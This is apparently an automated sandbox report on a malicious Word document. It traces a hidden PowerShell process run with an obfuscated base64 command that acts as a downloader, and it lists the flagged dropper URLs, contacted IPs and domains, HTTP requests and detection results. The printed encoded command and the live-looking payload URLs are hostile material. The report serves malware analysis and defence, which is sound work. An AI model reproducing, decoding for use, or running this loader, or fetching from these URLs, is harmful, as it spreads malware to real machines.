Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEMAcgBBACAAPQAgAFsAVAB5AFAARQBdACgAIgB7ADMAfQB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBGACAAJwBlAG0ALgBJAE8ALgAnACwAJwBTAHQAJwAsACcAZABpAHIAZQBDAHQATwByAHkAJwAsACcAcwBZACcAKQAgADsAIABTAFYAIAAgACgAIgA1AGgAdgAiACsAIgAxAHoAIgApACAAIAAoAFsAVAB5AFAARQBdACgAIgB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQB7ADAAfQAiAC0AZgAnAG4AQQBHAGUAUgAnACwAJwBzAFkAcwB0AEUAJwAsACcATQAuAE4AZQB0AC4AUwBlAFIAVgBpAGMAJwAsACcAQQAnACwAJwBlAHAATwBpAE4AVABtACcAKQAgACAAKQAgADsAIAAkAEEAdgBuAG4AMAB1AGYAPQAoACgAJwBUAHkANwBuACcAKwAnADAAJwApACsAJwBzAGMAJwApADsAJABIADIAcQA2AHEAcAB6AD0AJABVAG0AYwByAHUAZwAxACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABZAHYAawA2AGgAYwBwADsAJABOADYANgA3AGMAbABsAD0AKAAnAFAAJwArACgAJwA0AG0AJwArACcAcwAnACkAKwAoACcAdgAnACsAJwByAHMAJwApACkAOwAgACAAKAAgACAARwBlAFQALQBWAGEAUgBJAGEAQgBMAEUAIAAgACgAIgBDACIAKwAiAHIAYQAiACkAIAAgACkALgBWAGEATABVAEUAOgA6ACIAYwBSAGAAZQBgAEEAdABlAGQASQByAGAARQBjAHQAbwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBGACcAKwAoACcAMgBuACcAKwAnAGUAZgBxACcAKQArACcANgB7ADAAfQBQACcAKwAoACcAcgBzACcAKwAnADIAbgBkACcAKQArACcAaAB7ADAAfQAnACkALQBGACAAWwBDAEgAYQBSAF0AOQAyACkAKQA7ACQASwAwADAAYQBhADIAYwA9ACgAJwBXAGgAJwArACgAJwBwACcAKwAnAG8AagAnACkAKwAnAGwAbwAnACkAOwAgACAAKAAgAGcAZQBUAC0AVgBBAHIAaQBBAEIAbABlACAAKAAiADUASABWACIAKwAiADEAegAiACkAIAApAC4AVgBhAEwAVQBFADoAOgAiAHMARQBjAFUAUgBJAHQAeQBwAFIAYABPAFQAbwBDAGAATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABGAHoANQBkAHkAZwBzAD0AKAAnAEIAJwArACgAJwBwACcAKwAnADgAMgA1AGkAJwArACcAdgAnACkAKQA7ACQAUQA0AGEAOABsADEANQAgAD0AIAAoACgAJwBDAGgAJwArACcAcABpAGUAJwArACcAbwAnACkAKwAnAGcAJwApADsAJABVAGEAYgA2ADgAOABvAD0AKAAnAEsAJwArACcAeQAnACsAKAAnAGoAOAB4ACcAKwAnAG8AcQAnACkAKQA7ACQATAByADAAdwA1AGwAYQA9ACgAJwBQACcAKwAoACcAOQAnACsAJwBsAGMANwBmACcAKQArACcAdQAnACkAOwAkAFoAcgB3AGoAaAA5AGsAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAJwArACcAfQBGADIAbgAnACsAJwBlAGYAJwArACcAcQA2AHsAMAB9AFAAcgBzADIAJwArACcAbgBkAGgAewAwAH0AJwApAC0AZgBbAEMASABhAFIAXQA5ADIAKQArACQAUQA0AGEAOABsADEANQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBiAG0AeABmAHgAdgA9ACgAKAAnAEEAdwAnACsAJwBuACcAKQArACgAJwBnACcAKwAnADAAegA2ACcAKQApADsAJABWADAAXwByAGkAMABuAD0ATgBlAHcAYAAtAG8AQgBgAGoARQBjAFQAIABuAGUAVAAuAHcAZQBiAEMATABJAGUATgB0ADsAJABOAGsAcQBfAGcAMABxAD0AKAAoACcAaAAnACsAKAAoACcAdAB0AHAAOgAnACsAJwBKACkAKAAzAHMAJwApACkAKwAoACgAJwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAJwArACcAKQAoADMAcwAyACcAKwAnACkAKABhAHIAcQAnACkAKQArACcAdQBpACcAKwAoACcAdgAnACsAJwBvAHAAbwBwAC4AYwAnACkAKwAoACcAbwAnACsAJwBtACcAKwAnAC4AYgByAEoAJwApACsAKAAoACcAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAaQAnACkAKQArACcAbgAnACsAKAAnAGQAZQB4AF8AaAB0AG0AXwAnACsAJwBmACcAKwAnAGkAbAAnACsAJwBlAHMASgAnACkAKwAoACgAJwApACcAKwAnACgAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACcAKQApACsAKAAoACcAKABLAHgAJwArACcAaABKACcAKQApACsAKAAoACcAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAKQAoAEAAaAB0ACcAKwAnAHQAJwArACcAcAAnACkAKQArACgAKAAnAHMAOgBKACcAKwAnACkAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKABKACcAKwAnACkAJwApACkAKwAnACgAJ	Jump to behavior

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
194.209.195.106	unknown	Switzerland	3303	SWISSCOMSwisscomSwitzerlandLtdCH	true
35.208.182.43	unknown	United States	19527	GOOGLE-2US	true
177.12.163.108	unknown	Brazil	28299	IPV6InternetLtdaBR	true
103.205.64.138	unknown	India	17439	NETMAGIC-APNetmagicDatacenterMumbaiIN	true
35.208.153.170	unknown	United States	19527	GOOGLE-2US	true
70.32.23.44	unknown	United States	55293	A2HOSTINGUS	true

Contacted Domains

Name	IP	Active
isatechnology.com	35.208.182.43	true
physio-svdh.ch	194.209.195.106	true
transfersuvan.com	0.0.0.0	true
ownitconsignment.com	70.32.23.44	true
hotelshivansh.com	103.205.64.138	true
b2bcom.com.br	177.12.163.108	true
cairocad.com	35.208.153.170	true
arquivopop.com.br	unknown	unknown
www.isatechnology.com	unknown	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://hotelshivansh.com/UserFiles/8/	true	Avira URL Cloud: malware	unknown

AV Detection:

Antivirus detection for URL or domain

Source: http://hotelshivansh.com/UserFiles/8/	Avira URL Cloud: Label: malware
Source: https://www.isatechnology.com/training/b/	Avira URL Cloud: Label: malware
Source: http://transfersuvan.com/wp-admin/OVl/	Avira URL Cloud: Label: malware
Source: https://physio-svdh.ch/wp-admin/kK/P	Avira URL Cloud: Label: malware
Source: https://b2bcom.com.br/site/0H/	Avira URL Cloud: Label: phishing
Source: https://physio-svdh.ch/wp-admin/kK/	Avira URL Cloud: Label: malware
Source: http://arquivopop.com.br/index_htm_files/Kxh/	Avira URL Cloud: Label: malware
Source: https://cairocad.com/cgi-bin/1PBB/	Avira URL Cloud: Label: malware

Multi AV Scanner detection for submitted file

Source: v22Pc0qA.doc.doc	Metadefender: Detection: 44%			Perma Link
Source: v22Pc0qA.doc.doc	ReversingLabs: Detection: 86%

Compliance:

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown

HTTPS traffic detected: 177.12.163.108:443 -> 192.168.2.22:49173 version: TLS 1.0

Uses new MSVCR Dlls

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Binary contains paths to debug symbols

Source:	Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000004.00000002.2114201086.0000000002B57000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000004.00000002.2114201086.0000000002B57000.00000004.00000040.sdmp
Source:	Binary string: mscorlib.pdb source: powershell.exe, 00000004.00000002.2114201086.0000000002B57000.00000004.00000040.sdmp
Source:	Binary string: scorlib.pdb source: powershell.exe, 00000004.00000002.2114201086.0000000002B57000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2114201086.0000000002B57000.00000004.00000040.sdmp
Source:	Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000004.00000002.2114201086.0000000002B57000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2114201086.0000000002B57000.00000004.00000040.sdmp
Source:	Binary string: mscorrc.pdb source: powershell.exe, 00000004.00000002.2113923637.00000000028B0000.00000002.00000001.sdmp

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior

Software Vulnerabilities:

Potential document exploit detected (performs DNS queries)

Source: global traffic

DNS query: name: physio-svdh.ch

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 194.209.195.106:443

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 194.209.195.106:443

Networking:

Potential dropper URLs found in powershell memory

Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in memory: <img width="120" height="120" src="https://b2bcom.com.br/wp-content/uploads/2019/02/mktdigital-120x120.png" class="home__services--icon wp-post-image" alt="" srcset="https://b2bcom.com.br/wp-content/uploads/2019/02/mktdigital-120x120.png 120w, https://b2bcom.com.br/wp-content/uploads/2019/02/mktdigital.png 437w, https://b2bcom.com.br/wp-content/uploads/2019/02/mktdigital-100x100.png 100w" sizes="(max-width: 120px) 100vw, 120px" /></a>
Source: powershell.exe, 00000004.00000002.2117150009.0000000003A68000.00000004.00000001.sdmp	String found in memory: http://arquivopop.com.br/index_htm_files/Kxh/
Source: powershell.exe, 00000004.00000002.2117150009.0000000003A68000.00000004.00000001.sdmp	String found in memory: https://cairocad.com/cgi-bin/1PBB/
Source: powershell.exe, 00000004.00000002.2117150009.0000000003A68000.00000004.00000001.sdmp	String found in memory: https://www.isatechnology.com/training/b/
Source: powershell.exe, 00000004.00000002.2117150009.0000000003A68000.00000004.00000001.sdmp	String found in memory: http://hotelshivansh.com/UserFiles/8/
Source: powershell.exe, 00000004.00000002.2117150009.0000000003A68000.00000004.00000001.sdmp	String found in memory: http://ownitconsignment.com/files/b/
Source: powershell.exe, 00000004.00000002.2117150009.0000000003A68000.00000004.00000001.sdmp	String found in memory: https://b2bcom.com.br/site/0H/
Source: powershell.exe, 00000004.00000002.2117150009.0000000003A68000.00000004.00000001.sdmp	String found in memory: http://transfersuvan.com/wp-admin/OVl/
Source: powershell.exe, 00000004.00000002.2117150009.0000000003A68000.00000004.00000001.sdmp	String found in memory: https://physio-svdh.ch/wp-admin/kK/
Source: powershell.exe, 00000004.00000002.2119211418.000000001CCD0000.00000002.00000001.sdmp	String found in memory: Autoplay,http://go.microsoft.com/fwlink/?LinkId=30564-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwlink/?LinkId=131536-http://go.microsoft.com/fwlink/?LinkId=131535+http://go.microsoft.com/fwlink/?LinkId=8430
Source: powershell.exe, 00000004.00000002.2119211418.000000001CCD0000.00000002.00000001.sdmp	String found in memory: PRODUCT_KEY_PROBLEMS$ACTIVATION_TYPE_KEY_FIND_PRODUCT_KEY)ACTIVATION_TYPE_DIFF_KEY_FIND_PRODUCT_KEY+ACTIVATION_CHNG_TO_LICENSE_FIND_PRODUCT_KEYPA,ACTIVATION_PERIOD_EXPIRED_WHAT_IS_ACTIVATION-ACTIVATION_LICENSE_EXPIRED_WHAT_IS_ACTIVATION,ACTIVATION_LICENSE_EXPIRED_PRIVACY_STATEMENTPA,http://go.microsoft.com/fwlink/?LinkID=90983-http://go.microsoft.com/fwlink/?LinkId=123784PA$E77344FA-E978-464C-953E-EBA44F0522670ACTIVATION_ERROR_INSTALLING_REINSTALLING_WINDOWS$f3b8150b-0bd1-4fec-8283-7a1dd45c16377ACTIVATION_ERROR_REINSTALL_WINDOWS_CREATE_RESTORE_POINTPA-http://go.microsoft.com/fwlink/?LinkId=100109-http://go.microsoft.com/fwlink/?LinkId=100096-http://go.microsoft.com/fwlink/?LinkId=120830-http://go.microsoft.com/fwlink/?LinkId=120831,http://go.microsoft.com/fwlink/?LinkId=89429
Source: powershell.exe, 00000004.00000002.2119633139.000000001CEB7000.00000002.00000001.sdmp	String found in memory: Ease of Access Centero<a href="http://go.microsoft.com/fwlink/?linkid=63345">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63353">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63363">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63367">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63370">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63373">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63376">Learn about additional assistive technologies online</a>PA!Make your computer easier to use.BGet recommendations to make your computer easier to use (eyesight)CGet recommendations to make your computer easier to use (dexterity)AGet recommendations to make your computer easier to use (hearing)
Source: powershell.exe, 00000004.00000002.2119633139.000000001CEB7000.00000002.00000001.sdmp	String found in memory: Get recommendations to make your computer easier to use (speech)CGet recommendations to make your computer easier to use (cognitive)"Use the computer without a display
Source: powershell.exe, 00000004.00000002.2119633139.000000001CEB7000.00000002.00000001.sdmp	String found in memory: normal/http://images.metaservices.microsoft.com/cover/6http://redir.metaservices.microsoft.com/redir/buynow/?1http://redir.metaservices.microsoft.com/dvdcover/PA6http://redir.metaservices.microsoft.com/redir/buynow/?,http://windowsmedia.com/redir/findmedia.asp?9http://redir.metaservices.microsoft.com/redir/getmdrdvd/?8http://redir.metaservices.microsoft.com/redir/getmdrcd/?Bhttp://redir.metaservices.microsoft.com/redir/getmdrcdbackground/??http://redir.metaservices.microsoft.com/redir/getmdrcdposturl/?Ihttp://redir.metaservices.microsoft.com/redir/getmdrcdposturlbackground/?=http://redir.metaservices.microsoft.com/redir/getdaiposturl/?:http://redir.metaservices.microsoft.com/redir/daifailure/?
Source: powershell.exe, 00000004.00000002.2119633139.000000001CEB7000.00000002.00000001.sdmp	String found in memory: Microsoft Corporation/(C) Microsoft Corporation. All rights reserved.9http://redir.metaservices.microsoft.com/redir/submittoc/?-http://windowsmedia.com/redir/QueryTOCExt.asp1res://wmploc.dll/Offline_MediaInfo_NowPlaying.htm7http://redir.metaservices.microsoft.com/redir/buynowmg/,http://windowsmedia.com/redir/buyticket9.asp)http://windowsmedia.com/redir/IDPPage.asp)http://windowsmedia.com/redir/IDPLogo.asp
Source: powershell.exe, 00000004.00000002.2119633139.000000001CEB7000.00000002.00000001.sdmp	String found in memory: AMG Rating: %s stars:http://redir.metaservices.microsoft.com/redir/mediaguide/?9http://redir.metaservices.microsoft.com/redir/radiotuner/,http://windowsmedia.com/redir/QueryTOCNP.asp#Show Video and Visualization Window9http://redir.metaservices.microsoft.com/redir/dvddetails/9http://redir.metaservices.microsoft.com/redir/dvdwizard/?PA
Source: powershell.exe, 00000004.00000002.2119633139.000000001CEB7000.00000002.00000001.sdmp	String found in memory: Do you want to switch to it now?
Source: powershell.exe, 00000004.00000002.2119633139.000000001CEB7000.00000002.00000001.sdmp	String found in memory: http://www.microsoft.com/windows/windowsmedia/musicservices.aspx?http://redir.metaservices.microsoft.com/redir/allservices/?sv=2?http://redir.metaservices.microsoft.com/redir/allservices/?sv=3?http://redir.metaservices.microsoft.com/redir/allservices/?sv=5PA

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /files/b/ HTTP/1.1Host: ownitconsignment.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /UserFiles/8/ HTTP/1.1Host: hotelshivansh.comConnection: Keep-Alive

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: SWISSCOMSwisscomSwitzerlandLtdCH SWISSCOMSwisscomSwitzerlandLtdCH
Source: Joe Sandbox View	ASN Name: GOOGLE-2US GOOGLE-2US
Source: Joe Sandbox View	ASN Name: IPV6InternetLtdaBR IPV6InternetLtdaBR

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown

HTTPS traffic detected: 177.12.163.108:443 -> 192.168.2.22:49173 version: TLS 1.0

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{438FF120-FFD8-4816-B513-C2DC6937B540}.tmp

Jump to behavior

Source: global traffic	HTTP traffic detected: GET /files/b/ HTTP/1.1Host: ownitconsignment.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /UserFiles/8/ HTTP/1.1Host: hotelshivansh.comConnection: Keep-Alive

Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: <a class="social__anchor external" href="https://www.facebook.com/b2bcomcomunicacao" title="Facebook"> equals www.facebook.com (Facebook)
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: <a class="social__anchor external" href="https://www.youtube.com/channel/UCrYEOm4ym22murrhb0WGC2A" title="Youtube"> equals www.youtube.com (Youtube)
Source: powershell.exe, 00000004.00000002.2119211418.000000001CCD0000.00000002.00000001.sdmp	String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: powershell.exe, 00000004.00000002.2118741244.000000001B584000.00000004.00000001.sdmp	String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: unknown

DNS traffic detected: queries for: physio-svdh.ch

Source: global traffic

Source: E0F5C59F9FA661F6F4C50B87FEF3A15A.4.dr	String found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
Source: powershell.exe, 00000004.00000002.2114718419.0000000002EF2000.00000004.00000001.sdmp	String found in binary or memory: http://arquivopop.com.br
Source: powershell.exe, 00000004.00000002.2114718419.0000000002EF2000.00000004.00000001.sdmp, powershell.exe, 00000004.00000002.2117150009.0000000003A68000.00000004.00000001.sdmp	String found in binary or memory: http://arquivopop.com.br/index_htm_files/Kxh/
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: http://cps.letsencrypt.org0
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: http://cps.root-x1.letsencrypt.org0
Source: powershell.exe, 00000004.00000003.2110380198.000000001B625000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: powershell.exe, 00000004.00000003.2110391188.000000001B636000.00000004.00000001.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: powershell.exe, 00000004.00000003.2110380198.000000001B625000.00000004.00000001.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: powershell.exe, 00000004.00000003.2110391188.000000001B636000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
Source: powershell.exe, 00000004.00000003.2110380198.000000001B625000.00000004.00000001.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: powershell.exe, 00000004.00000003.2110380198.000000001B625000.00000004.00000001.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: powershell.exe, 00000004.00000002.2110705774.0000000000234000.00000004.00000020.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: powershell.exe, 00000004.00000003.2106686641.000000001D0B8000.00000004.00000001.sdmp, powershell.exe, 00000004.00000002.2118830789.000000001B608000.00000004.00000001.sdmp, powershell.exe, 00000004.00000002.2118741244.000000001B584000.00000004.00000001.sdmp, powershell.exe, 00000004.00000003.2110391188.000000001B636000.00000004.00000001.sdmp, 77EC63BDA74BD0D0E0426DC8F8008506.4.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: powershell.exe, 00000004.00000002.2118741244.000000001B584000.00000004.00000001.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab4
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: http://hotelshivansh.com
Source: powershell.exe, 00000004.00000002.2114718419.0000000002EF2000.00000004.00000001.sdmp, powershell.exe, 00000004.00000002.2117150009.0000000003A68000.00000004.00000001.sdmp	String found in binary or memory: http://hotelshivansh.com/UserFiles/8/
Source: powershell.exe, 00000004.00000002.2119211418.000000001CCD0000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com
Source: powershell.exe, 00000004.00000002.2119211418.000000001CCD0000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com/
Source: powershell.exe, 00000004.00000002.2119633139.000000001CEB7000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: powershell.exe, 00000004.00000002.2119633139.000000001CEB7000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: powershell.exe, 00000004.00000003.2110380198.000000001B625000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: powershell.exe, 00000004.00000003.2110380198.000000001B625000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: powershell.exe, 00000004.00000003.2110380198.000000001B625000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: powershell.exe, 00000004.00000003.2110380198.000000001B625000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: powershell.exe, 00000004.00000003.2110380198.000000001B625000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: powershell.exe, 00000004.00000003.2110380198.000000001B625000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: powershell.exe, 00000004.00000003.2110391188.000000001B636000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: powershell.exe, 00000004.00000002.2115355301.00000000031C0000.00000004.00000001.sdmp	String found in binary or memory: http://ownitconsignment.com
Source: powershell.exe, 00000004.00000002.2114718419.0000000002EF2000.00000004.00000001.sdmp, powershell.exe, 00000004.00000002.2117150009.0000000003A68000.00000004.00000001.sdmp	String found in binary or memory: http://ownitconsignment.com/files/b/
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: http://r3.i.lencr.org/0)
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: http://r3.o.lencr.org0
Source: powershell.exe, 00000004.00000002.2112079841.00000000023F0000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: powershell.exe, 00000004.00000002.2120136620.000000001D2B0000.00000002.00000001.sdmp	String found in binary or memory: http://servername/isapibackend.dll
Source: powershell.exe, 00000004.00000002.2119633139.000000001CEB7000.00000002.00000001.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: powershell.exe, 00000004.00000002.2115355301.00000000031C0000.00000004.00000001.sdmp	String found in binary or memory: http://transfersuvan.com
Source: powershell.exe, 00000004.00000002.2114718419.0000000002EF2000.00000004.00000001.sdmp, powershell.exe, 00000004.00000002.2117150009.0000000003A68000.00000004.00000001.sdmp	String found in binary or memory: http://transfersuvan.com/wp-admin/OVl/
Source: powershell.exe, 00000004.00000002.2119633139.000000001CEB7000.00000002.00000001.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: powershell.exe, 00000004.00000002.2112079841.00000000023F0000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: powershell.exe, 00000004.00000003.2110391188.000000001B636000.00000004.00000001.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: powershell.exe, 00000004.00000003.2110380198.000000001B625000.00000004.00000001.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: powershell.exe, 00000004.00000002.2119211418.000000001CCD0000.00000002.00000001.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: powershell.exe, 00000004.00000002.2119633139.000000001CEB7000.00000002.00000001.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: powershell.exe, 00000004.00000002.2119211418.000000001CCD0000.00000002.00000001.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: powershell.exe, 00000004.00000002.2110680458.00000000001E7000.00000004.00000020.sdmp	String found in binary or memory: http://www.piriform.com/ccleane
Source: powershell.exe, 00000004.00000002.2110680458.00000000001E7000.00000004.00000020.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: powershell.exe, 00000004.00000002.2119211418.000000001CCD0000.00000002.00000001.sdmp	String found in binary or memory: http://www.windows.com/pctv.
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://api.w.org/
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/#about
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/#blog
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/#clients
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/#contact
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/#home
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/#portfolio
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/#services
